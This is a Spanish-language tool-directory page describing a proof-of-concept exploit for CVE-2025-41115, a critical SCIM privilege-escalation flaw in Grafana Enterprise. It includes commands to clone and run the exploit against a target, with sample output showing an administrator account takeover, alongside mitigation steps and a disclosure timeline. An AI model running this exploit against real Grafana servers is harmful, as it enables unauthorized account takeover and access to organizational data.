Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
Herramientas/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad en la NubeGestión de Identidad y Acceso (IAM)Autenticación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
rockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

Ver Repositorio
1hace 9 mesesAún no revisado

🔐 CVE-2025-41115: Escalada de privilegios crítica en SCIM de Grafana

218fa54275e0e31c37b4e5091d9112ba_M

Vulnerabilidad crítica de escalada de privilegios en SCIM de Grafana Enterprise


🌟 Resumen

CVE-2025-41115 es una vulnerabilidad Crítica (CVSS 10.0) en Grafana Enterprise que afecta a su función de aprovisionamiento de usuarios SCIM.

Cuando el aprovisionamiento SCIM está habilitado y user_sync_enabled = true, un cliente SCIM malicioso puede enviar un externalId numérico, que Grafana asigna erróneamente a un ID de usuario interno, lo que permite a un atacante suplantar o sobrescribir cuentas existentes, incluidas las de administradores. ⚠️ Grafana OSS NO está afectado.


🚨 Impacto

  • 🔓 Toma de control de cuentas (incluidas cuentas de administrador)
  • 🚀 Escalada de privilegios con derechos de administrador completos
  • 🗄️ Acceso a paneles / datos / configuraciones de la organización
  • 🌐 Explotable a través de la red con requisitos bajos
  • 🛑 Alto riesgo para entornos SSO empresariales o multiinquilino

Condiciones necesarias para la explotación:

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 Versiones afectadas

VersionEstado
12.0.0 → 12.2.1❌ Vulnerable
12.3.0✅ Parcheado
12.2.1 (compilación parcheada)✅ Parcheado
12.1.3

💡 Los servicios de Grafana gestionados (AWS/Azure/Grafana Cloud) fueron parcheados por los proveedores.


Cómo usarlo en 3 segundos:

1. Descargar

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

o simplemente copia y pega el script anterior en un archivo

2. Hazlo ejecutable (opcional)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. Ejecutar

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

Cuando el exploit realmente funciona (es decir, el objetivo es vulnerable y el token es válido), verás una salida exactamente como esta: texto

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 Pasos de mitigación

🥇 1. Actualiza inmediatamente

Actualiza a 12.3.0 o a una de las versiones de mantenimiento parcheadas.

🛠️ 2. Revisa tu configuración de SCIM

Si no estás usando el aprovisionamiento SCIM, asegúrate de tener:

root@kitploit:~
enableSCIM = false

o

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. Registros de auditoría

Busca:

  • Nuevos usuarios inesperados
  • Uso de externalId numérico
  • Cambios de privilegios

🔐 4. Límites de confianza

Asegúrate de que solo proveedores de identidad de confianza puedan comunicarse con tu endpoint SCIM.

👀 5. Supervisa la explotación

Vigila inicios de sesión sospechosos, eventos de creación de usuarios o toma de control de administradores.


📅 Cronología

  • 📌 2025-11-04 — Problema descubierto internamente
  • 📌 2025-11-04 — Incidente declarado
  • 📌 2025-11-05 — Proveedores de la nube notificados y parcheados en privado
  • 📌 2025-11-19 — Divulgación pública y lanzamiento del parche oficial

📝 Notas adicionales

  • 🎯 El fallo se debe específicamente a que Grafana asigna externalId numérico → uid interno.
  • 🟢 La explotación requiere SCIM con sincronización de usuarios, por lo que muchas implementaciones están seguras por defecto, pero debes confirmarlo.
  • ⚡ No hay explotación confirmada en el mundo real al momento de la divulgación, pero la puntuación CVSS 10 significa que es extremadamente peligrosa.

¡¡¡descargo de responsabilidad!!!

Este PoC es solo para pruebas de seguridad autorizadas y uso educativo en sistemas que posees o para los que tienes permiso escrito explícito para probar. El uso no autorizado es ilegal y puede dar lugar a un proceso penal. El autor y el distribuidor no asumen ninguna responsabilidad por el mal uso. Parchea inmediatamente (≥12.0.6 / 12.3.0+).

Descargar herramienta
✅ Parcheado
12.0.6✅ Parcheado